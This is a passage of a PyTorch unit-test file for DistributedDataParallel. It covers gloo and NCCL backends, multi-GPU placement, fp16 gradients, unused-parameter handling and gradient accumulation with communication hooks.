device=gpus[0], memory_format=layouts[0], dtype=dtypes[0]
)
self.conv1 = torch.nn.Conv2d(16, 32, (2, 2)).to(
device=gpus[1], memory_format=layouts[1], dtype=dtypes[1]
)
self.conv2 = torch.nn.Conv2d(32, 16, (2, 2)).to(
device=gpus[2], memory_format=layouts[2], dtype=dtypes[2]
)
self.conv3 = torch.nn.Conv2d(16, 8, (2, 2)).to(
device=gpus[3], memory_format=layouts[3], dtype=dtypes[3]
)
def forward(self, x):
x = x.to(self.dtypes[0])
# Could say
# x = self.conv0(x).to(device=self.conv1.weight.device, dtype=self.dtypes[1])
# etc. But I don't want to appeal to the weights' devices directly, because part of this test's purpose
# is to verify weights are where expected if the model gets replicated.
gpus = self.layer_gpus if hasattr(self, "layer_gpus") else [x.device] * 4
x = self.conv0(x).to(device=gpus[1], dtype=self.dtypes[1])
x = self.conv1(x).to(device=gpus[2], dtype=self.dtypes[2])
x = self.conv2(x).to(device=gpus[3], dtype=self.dtypes[3])
return self.conv3(x)
class Task(nn.Module):
def __init__(self):
super().__init__()
self.p = nn.Parameter(torch.ones(2, 2))
def forward(self, x):
return self.p + x
class ModuleForDdpCommHook(nn.Module):
def __init__(self):
super().__init__()
self.t0 = Task()
def forward(self, x, rank):
return self.t0(x + rank)
class SparseGradientModule(nn.Module):
def __init__(self):
super(SparseGradientModule, self).__init__()
self.embedding = nn.EmbeddingBag(10, 10, sparse=True)
def forward(self, x):
return F.softmax(self.embedding(x), dim=1)
@unittest.skipIf(
TEST_WITH_TSAN,
"TSAN is not fork-safe since we're forking in a multi-threaded environment",
)
class DistributedDataParallelTest(MultiProcessTestCase):
def setUp(self):
super(DistributedDataParallelTest, self).setUp()
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
if sys.platform == "win32":
self._spawn_processes()
else:
self._fork_processes()
def tearDown(self):
# DistributedDataParallel test doesn't seem to call FileStore destructor
# TODO: investigate this test and the test is known to have issues
# Use this hack to remove files for that test
try:
os.remove(self.file_name)
except OSError:
pass
@property
def world_size(self):
return 2
def _prepare_single_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
model = Net()
device = devices[0] if devices else torch.device("cuda:%d" % self.rank)
ddp_model = DistributedDataParallel(
copy.deepcopy(model).to(device),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
model.to(device)
input = torch.randn(global_batch_size, 2).to(device)
target = torch.randn(global_batch_size, 4).to(device)
return model, ddp_model, input, target
def _prepare_multi_device_module(
self,
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view=False,
):
self.assertTrue(
len(devices) == 2 or len(devices) == 4,
"unexpected devices for ddp tests {}".format(devices),
)
if len(devices) == 2:
model = DoubleGpuNet(devices)
elif len(devices) == 4:
model = QuadraGpuNet(devices)
ddp_model = DistributedDataParallel(
copy.deepcopy(model),
device_ids=device_ids,
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
input = torch.randn(global_batch_size, 2).cuda(devices[0])
target = torch.randn(global_batch_size, 4)
return model, ddp_model, input, target
def _test_ddp_with_process_group(
self,
process_group,
devices,
device_ids,
multi_device=False,
gradient_as_bucket_view=False,
):
"""
Note: we pass down `device_ids` all the way to DistributedDataParallel
as part of the test. Below you find tests that either use a list of
integers, a list of `torch.Device` instances, or an empty list.
The `devices` argument is used to control placement of the model and
must always be specified as list of `torch.Device` instances.
"""
local_batch_size = 1 if devices is None else len(devices)
global_batch_size = self.world_size * local_batch_size
if multi_device:
model, ddp_model, input, target = self._prepare_multi_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model.get_ddp_logging_data()
self.assertTrue(ddp_logging_data.is_multi_device_module)
else:
model, ddp_model, input, target = self._prepare_single_device_module(
process_group,
devices,
device_ids,
global_batch_size,
gradient_as_bucket_view,
)
ddp_logging_data = ddp_model.get_ddp_logging_data()
self.assertFalse(ddp_logging_data.is_multi_device_module)
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
def update_parameters(model):
for param in model.parameters():
with torch.no_grad():
param -= param.grad
param.grad = None
# check two model parameters over 2 iterations
for iteration in range(2):
# single cpu/gpu training
step_model(model, input, target)
# DDP training, DDP scatters subsets of input_cpu to nodes/GPUs
step_model(
ddp_model,
input[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
target[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
],
)
# Update weights and run a second iteration to shake out errors
update_parameters(model)
update_parameters(ddp_model)
self.assertEqual(
len(list(model.parameters())), len(list(ddp_model.parameters()))
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertEqual(i, j)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
def _test_gloo_backend(
self, devices, device_ids, multi_device=False, gradient_as_bucket_view=False
):
store = c10d.FileStore(self.file_name, self.world_size)
options = c10d.ProcessGroupGloo.Options()
options._devices = [create_device(interface=LOOPBACK)]
process_group = c10d.ProcessGroupGloo(
store, self.rank, self.world_size, options
)
self._test_ddp_with_process_group(
process_group, devices, device_ids, multi_device, gradient_as_bucket_view
)
@requires_gloo()
def test_gloo_backend_cpu_module(self):
self._test_gloo_backend([torch.device("cpu")], None)
@requires_gloo()
def test_gloo_backend_cpu_module_grad_is_view(self):
self._test_gloo_backend([torch.device("cpu")], None, gradient_as_bucket_view=True)
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_gloo_backend_1gpu_module_device_ids_integer_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_gloo_backend(devices, int_devices)
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_gloo_backend_1gpu_module_device_ids_torch_device_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_gloo_backend(devices, devices)
@requires_gloo()
@skip_if_lt_x_gpu(4)
def test_gloo_backend_2gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_gloo_backend(devices, None, multi_device=True)
@requires_gloo()
@skip_if_lt_x_gpu(8)
def test_gloo_backend_4gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:4]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_gloo_backend(devices, None, multi_device=True)
def _test_nccl_backend(
self, devices, device_ids, multi_device=False, gradient_as_bucket_view=False
):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
self._test_ddp_with_process_group(
process_group, devices, device_ids, multi_device, gradient_as_bucket_view
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_multi_device_ids_not_allowed(self):
int_devices = list(range(torch.cuda.device_count()))
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
with self.assertRaisesRegex(ValueError, "device_ids can only be None or contain a single element."):
self._test_nccl_backend(devices, int_devices)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_single_device_module_device_ids_None(self):
self._test_nccl_backend(None, None)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_single_device_module_empty_device_ids(self):
# This tests the backward compatibility of accepting an empty list as `device_ids`,
# although we no longer document this in favor of the default value of `None`,
# which is consistent with multi-device modules and CPU modules.
self._test_nccl_backend(None, [])
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_backend_multi_device_module_device_ids_None(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_1gpu_module_device_ids_integer_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, int_devices)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_1gpu_module_device_ids_torch_device_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, devices)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_backend_2gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(8)
def test_nccl_backend_4gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:4]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_ddp_multi_device_module_config(self):
gpus = gpus_for_rank(self.world_size)[self.rank]
self.assertTrue(len(gpus) >= 2, "expecting at least 2 gpus per process")
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
gpus = gpus[:2]
model = DoubleGpuNet(gpus)
with self.assertRaisesRegex(
ValueError,
"DistributedDataParallel device_ids and output_device arguments only work with "
"single-device/multiple-device GPU modules or CPU modules",
):
ddp_model = DistributedDataParallel(
model, output_device=gpus[1], process_group=process_group
)
with self.assertRaisesRegex(ValueError, "device_ids can only be None or contain a single element."):
ddp_model = DistributedDataParallel(
model, device_ids=gpus, process_group=process_group
)
with self.assertRaisesRegex(
ValueError, "input module must be on the same type of devices"
):
model.fc1 = model.fc1.cpu()
ddp_model = DistributedDataParallel(model, process_group=process_group)
model = model.cpu()
with self.assertRaisesRegex(ValueError, "device_ids can only be None or contain a single element."):
ddp_model = DistributedDataParallel(
model, device_ids=gpus, process_group=process_group
)
def _test_fp16(self, gradient_as_bucket_view=False):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
gpus = gpus_for_rank(self.world_size)[self.rank]
model = nn.Linear(1, 1, bias=False).cuda(gpus[0]).half()
nn.init.constant_(model.weight, 1)
ddp_model = DistributedDataParallel(
model,
device_ids=[gpus[0]],
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Input 2**15, so that the gradients will overflow with a
# world_size of 2, unless we normalize the gradient by the
# world_size before the reduction
input = torch.tensor([[2 ** 15]]).cuda(gpus[0]).half()
# Step model
ddp_model.train()
output = ddp_model(input)
loss = output.sum()
loss.backward()
self.assertFalse(any(torch.isinf(p.grad).any() for p in ddp_model.parameters()))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16(self):
self._test_fp16()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_grad_is_view(self):
self._test_fp16(gradient_as_bucket_view=True)
def _test_arbitrary_forward_return_value(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class ForwardReturnValueModule(nn.Module):
def __init__(self):
super(ForwardReturnValueModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x, fn):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
# The first softmax does NOT include fc3 in its autograd graph
# whereas the second softmax DOES. If we pass only the first
# tensor we see in the output to the reducer, it marks the
# gradient for fc3 as ready (because it doesn't show up). If
# downstream uses of this return value choose to differentiate
# against the second output tensor, it would still receive a
# gradient and a callback for this tensor, resulting in a crash.
return fn(
F.softmax(x, dim=1),
F.softmax(self.fc3(x), dim=1),
)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
ForwardReturnValueModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
# Always run "backward" to ensure the reducer is called by autograd.
# If we don't correctly capture the output tensors from the return value,
# the reducer won't see a hook for the unused parameter, and throw an error.
# The correct capture is what we're testing in this function.
def test(box, unbox):
output = model(input, fn=box)
loss = criterion(unbox(output), target)
loss.backward()
# Test with identity return value
test(
box=lambda x, y: (x, y),
unbox=lambda obj: obj[1],
)
# Test with list return value
test(
box=lambda x, y: ["foo", x, "bar", y],
unbox=lambda obj: obj[3],
)
# Test with tuple return value
test(
box=lambda x, y: ("foo", x, "bar", y),
unbox=lambda obj: obj[3],
)
# Test with dict return value
test(
box=lambda x, y: {"foo": "bar", "a": x, "b": y},
unbox=lambda obj: obj["b"],
)
# Test with list with dict return value
test(
box=lambda x, y: ["foo", "bar", {"a": x, "b": y}],
unbox=lambda obj: obj[2]["b"],
)
# Test with dict with list return value
test(
box=lambda x, y: {"foo": "bar", "list": [0, x, 1, y]},
unbox=lambda obj: obj["list"][3],
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_arbitrary_forward_return_value(self):
self._test_arbitrary_forward_return_value()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_arbitrary_forward_return_value_grad_is_view(self):
self._test_arbitrary_forward_return_value(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_ddp_with_lazy_parameters(self):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Modules with uninitialized parameters"
):
DistributedDataParallel(
torch.nn.LazyLinear(10), process_group=process_group
)
def _test_find_unused_parameters_kwarg(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class FindUnusedParametersModule(nn.Module):
def __init__(self):
super(FindUnusedParametersModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
# Return the fc3 module so that the caller can invoke it
# outside of the forward function. While this is bad practice,
# we can use it to trigger a reducer error.
return (F.softmax(x, dim=1), self.fc3)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
def test_find_unused_parameters(
find_unused_parameters, test_default=False, gradient_as_bucket_view=False
):
if test_default:
model = DistributedDataParallel(
FindUnusedParametersModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
else:
model = DistributedDataParallel(
FindUnusedParametersModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
find_unused_parameters=find_unused_parameters,
gradient_as_bucket_view=gradient_as_bucket_view,
)
output, fc3 = model(input)
output = fc3(output)
loss = criterion(output, target)
loss.backward()
# First test that finding unused params under these conditions is to
# trigger an error when `backward` is called (because fc3 is an unused
# parameter and will therefore be marked ready twice).
try:
test_find_unused_parameters(
True, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.assertTrue(
str(ex).startswith("Expected to mark a variable ready only once.")
)
else:
self.fail("Expected exception")
# Then test that the default behavior can be overridden by setting
# `find_unused_parameters=False`.
try:
test_find_unused_parameters(
False, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.fail("Unexpected exception: %s" % ex)
# Test find_unused_parameters defaults to False
try:
test_find_unused_parameters(
True, test_default=True, gradient_as_bucket_view=gradient_as_bucket_view
)
except Exception as ex:
self.fail("Unexpected exception: %s" % ex)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_find_unused_parameters_kwarg(self):
self._test_find_unused_parameters_kwarg()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_find_unused_parameters_kwarg_grad_is_view(self):
self._test_find_unused_parameters_kwarg(gradient_as_bucket_view=True)
def _test_global_local_unused_params_grad(self, gradient_as_bucket_view=False):
"""
By simulating a multi-task training, this test is to make sure:
1) DDP does not touch the grad of globally unused parameters.
2) DDP does update the grad of locally unused parameters.
"""
class GlobalLocalUnusedParamModule(nn.Module):
def __init__(self):
super(GlobalLocalUnusedParamModule, self).__init__()
self.t0 = Task()
self.t1 = Task()
self.task_unused = Task()
def task_parameters(self):
return (self.t0.p, self.t1.p, self.task_unused.p)
def forward(self, x, rank):
return self.t0(x) if rank == 0 else self.t1(x)
def run_and_verify_grad(model):
# Run forward
output = model(8, self.rank)
# The grads of all parameters should be None at this point.
t0_p, t1_p, task_unused_p = model.module.task_parameters()
self.assertIsNone(t0_p.grad)
self.assertIsNone(t1_p.grad)
self.assertIsNone(task_unused_p.grad)
# Run backward
output.mean().backward()
# Now locally unused parameter should have grad updated on all ranks.
# However the globally unused parameter should still have None grad.
self.assertIsNotNone(t0_p.grad)
self.assertIsNotNone(t1_p.grad)
self.assertIsNone(task_unused_p.grad)
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
# Test on CPU
cpu_model = DistributedDataParallel(
GlobalLocalUnusedParamModule().cpu(),
process_group=process_group,
find_unused_parameters=True,
gradient_as_bucket_view=gradient_as_bucket_view,
)
run_and_verify_grad(cpu_model)
# Test on GPU
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
GlobalLocalUnusedParamModule().to(device_id),
device_ids=[device_id],
process_group=process_group,
find_unused_parameters=True,
gradient_as_bucket_view=gradient_as_bucket_view,
)
run_and_verify_grad(gpu_model)
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_global_local_unused_params_grad(self):
self._test_global_local_unused_params_grad()
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_global_local_unused_params_grad_with_grad_is_view(self):
self._test_global_local_unused_params_grad(gradient_as_bucket_view=True)
@requires_gloo()
@skip_if_lt_x_gpu(2)
def test_find_unused_parameters_when_unused_parameters_empty(self):
"""
An empty unused_parameters array does not imply find_unused_parameters =
false. This test makes sure that DDP allreduces unused parameters
accordingly where the forward pass in some process uses all parameters.
This unit test creates a module that uses all parameters in rank = 0, and
has unused parameters in other ranks.
"""
class FindUnusedParamModule(nn.Module):
def __init__(self):
super(FindUnusedParamModule, self).__init__()
self.t0 = Task()
self.t1 = Task()
def task_parameters(self):
return (self.t0.p, self.t1.p)
def forward(self, x, rank):
return self.t1(self.t0(x)) if rank == 0 else self.t1(x)
def run_and_verify_grad(model):
# Run forward
output = model(8, self.rank)
# The grads of all parameters should be None at this point.
[self.assertIsNone(t_p.grad) for t_p in model.module.task_parameters()]
# Run backward
output.mean().backward()
# Now locally unused parameter should have grad updated on all ranks.
[self.assertIsNotNone(t_p.grad) for t_p in model.module.task_parameters()]
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
# Test on CPU
cpu_model = DistributedDataParallel(
FindUnusedParamModule().cpu(),
process_group=process_group,
find_unused_parameters=True,
)
run_and_verify_grad(cpu_model)
# Test on GPU
device_id = gpus_for_rank(self.world_size)[self.rank][0]
gpu_model = DistributedDataParallel(
FindUnusedParamModule().to(device_id),
device_ids=[device_id],
process_group=process_group,
find_unused_parameters=True,
)
run_and_verify_grad(gpu_model)
def _test_multiple_outputs_multiple_backward(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class MultipleOutputModule(nn.Module):
def __init__(self):
super(MultipleOutputModule, self).__init__()
def define_module():
return nn.Sequential(
nn.Linear(2, 10, bias=False),
nn.ReLU(),
nn.Linear(10, 4, bias=False),
nn.ReLU(),
)
self.module0 = define_module()
self.module1 = define_module()
def forward(self, x):
return (
F.softmax(self.module0(x), dim=1),
F.softmax(self.module1(x), dim=1),
)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
MultipleOutputModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
# Compute loss and gradients for both outputs
output1, output2 = model(input)
loss1 = criterion(output1, target)
loss1.backward()
loss2 = criterion(output2, target)
loss2.backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_multiple_outputs_multiple_backward(self):
self._test_multiple_outputs_multiple_backward()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_multiple_outputs_multiple_backward_grad_is_view(self):
self._test_multiple_outputs_multiple_backward(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_no_grad(self):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class NoGradModule(nn.Module):
def __init__(self):
super(NoGradModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
NoGradModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
)
batch_size = 4
input = torch.rand([batch_size, 2], dtype=torch.float)
def check_no_grads():
for p in model.parameters():
self.assertTrue(p.requires_grad)
self.assertIsNone(p.grad)
# After initialization, no parameter has their gradient set.
check_no_grads()
# Run `forward` function with torch.no_grad()
with torch.no_grad():
output = model(input)
self.assertTrue(isinstance(output, torch.Tensor))
# No parameter should have their gradient set.
check_no_grads()
def _test_accumulate_gradients_no_sync(
self, num_iters=2, ddp_comm_hook=None, gradient_as_bucket_view=False
):
"""
This is the recommended way to implement accumulate grads.
If ``ddp_comm_hook`` input was specified, it will also register that hook
to the ``ddp_model``. The hook fed into this function should not change
the resulting gradients.
"""
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
global_batch_size = self.world_size
local_batch_size = len(devices)
model, ddp_model, input, target = self._prepare_single_device_module(
process_group, devices, devices, global_batch_size, gradient_as_bucket_view
)
if ddp_comm_hook is not None:
ddp_model.register_comm_hook(process_group, ddp_comm_hook)
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
# ensure accumulate grads works with no_grad
with torch.no_grad():
with ddp_model.no_sync():
ddp_model.train()
ddp_model(input)
# check two model parameters over num_iters iterations
for iteration in range(num_iters):
# single cpu/gpu training
step_model(model, input, target)
ddp_input = input[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
]
ddp_target = target[
self.rank * local_batch_size : (self.rank + 1) * local_batch_size
]
if iteration % num_iters == 0:
# accumulate grads locally
with ddp_model.no_sync():
step_model(ddp_model, ddp_input, ddp_target)
else:
# sync grads
step_model(ddp_model, ddp_input, ddp_target)
for i, j in zip(model.parameters(), ddp_model.parameters()):
if iteration % num_iters == 0:
self.assertNotEqual(i.grad, j.grad)
else:
self.assertEqual(i.grad, j.grad)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_no_sync(self):
"""
Runs _test_accumulate_gradients_no_sync using default inputs
"""
self._test_accumulate_gradients_no_sync()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_no_sync_grad_is_view(self):
"""
Runs _test_accumulate_gradients_no_sync using default inputs
"""
self._test_accumulate_gradients_no_sync(gradient_as_bucket_view=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_no_sync_allreduce_hook(self):
"""
Runs multiple iterations on _test_accumulate_gradients_no_sync
using allreduce hook and validates whether future result was properly
passed as gradients in reducer.
"""
def allreduce_hook(
process_group: object, bucket: dist.GradBucket
) -> torch._C.Future:
tensors = [t / self.world_size for t in bucket.get_tensors()]
return process_group.allreduce(tensors).get_future()
self._test_accumulate_gradients_no_sync(
num_iters=4, ddp_comm_hook=allreduce_hook
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_no_sync_allreduce_with_then_hook(self):
"""
Runs multiple iterations on _test_accumulate_gradients_no_sync using allreduce
hook that also uses then callbacks. In first then callback result is multiplied
by 2, and the second callback divides the result by 2 * world_size. It validates
whether final result was properly passed as gradients in reducer.
"""
def allreduce_with_then_hook(
process_group: object, bucket: dist.GradBucket
) -> torch.futures.Future:
fut = process_group.allreduce(bucket.get_tensors()).get_future()
def mult(fut):
# Multiply the result by 2.
return [2 * t for t in fut.wait()]
def div(fut):
# Divide the result by 2 * world_size.
return [t / (2 * self.world_size) for t in fut.wait()]
return fut.then(mult).then(div)
self._test_accumulate_gradients_no_sync(
num_iters=4, ddp_comm_hook=allreduce_with_then_hook
)
def _test_accumulate_gradients_module(self, gradient_as_bucket_view=False):
# This is NOT the recommended way to implement accumulating grads, but
# we would like to make sure DDP does not mess up with the underlying
# module.
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
global_batch_size = self.world_size
model, ddp_model, input, target = self._prepare_single_device_module(
process_group, devices, devices, global_batch_size, gradient_as_bucket_view
)
def step_model(model, input, target):
model.train()
output = model(input)
loss = F.mse_loss(output, target.to(output.device))
loss.backward()
# ensure accumulate grads works with no_grad
with torch.no_grad():
ddp_model.train()
ddp_model.module(input)
# Check two model parameters over 4 iterations.
# Use 4 iterations because we alternate between reducing and
# not reducing and want to make sure we switch both ways.
for iteration in range(4):
step_model(model, input, target)
if iteration % 2 == 0:
# Skip gradients sync without calling prepare_for_backward
step_model(
ddp_model.module,
input[self.rank : (self.rank + 1)],
target[self.rank : (self.rank + 1)],
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
self.assertNotEqual(i.grad, j.grad)
else:
step_model(
ddp_model,
input[self.rank : (self.rank + 1)],
target[self.rank : (self.rank + 1)],
)
for i, j in zip(model.parameters(), ddp_model.parameters()):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(i.grad, j.grad)
# Shuffle the input so that DDP input is different
torch.manual_seed(1337 + iteration)
input = input[torch.randperm(global_batch_size)]
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_module(self):
self._test_accumulate_gradients_module()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_accumulate_gradients_module_with_grad_is_view(self):
self._test_accumulate_gradients_module(gradient_as_bucket_view=True)
@requires_gloo()
def test_ignored_output(self):
"""
Test that the output of a model can be ignored and that there is no
implicit requirement that `backward` gets called.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
class IgnoredOutput(nn.Module):
def __init__(self):
super(IgnoredOutput, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
model = DistributedDataParallel(
IgnoredOutput().float(),
process_group=process_group,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)])
# Run a few iterations where we ignore the output.
for _ in range(4):
output = model(input)
del output
# Run a few iterations where we use the output.
for _ in range(4):
output = model(input)
loss = criterion(output, target)
loss.backward()
@requires_gloo()
def test_ignored_output_with_unused_parameters(self):
"""
Test that the output of a model can be ignored and that there is no
implicit requirement that `backward` gets called, if not all model
parameters participated in computing the model output.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
class IgnoredOutputWithUnusedParameters(nn.Module):
def __init__(self):
super(IgnoredOutputWithUnusedParameters, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
return F.softmax(x, dim=1)
model = DistributedDataParallel(
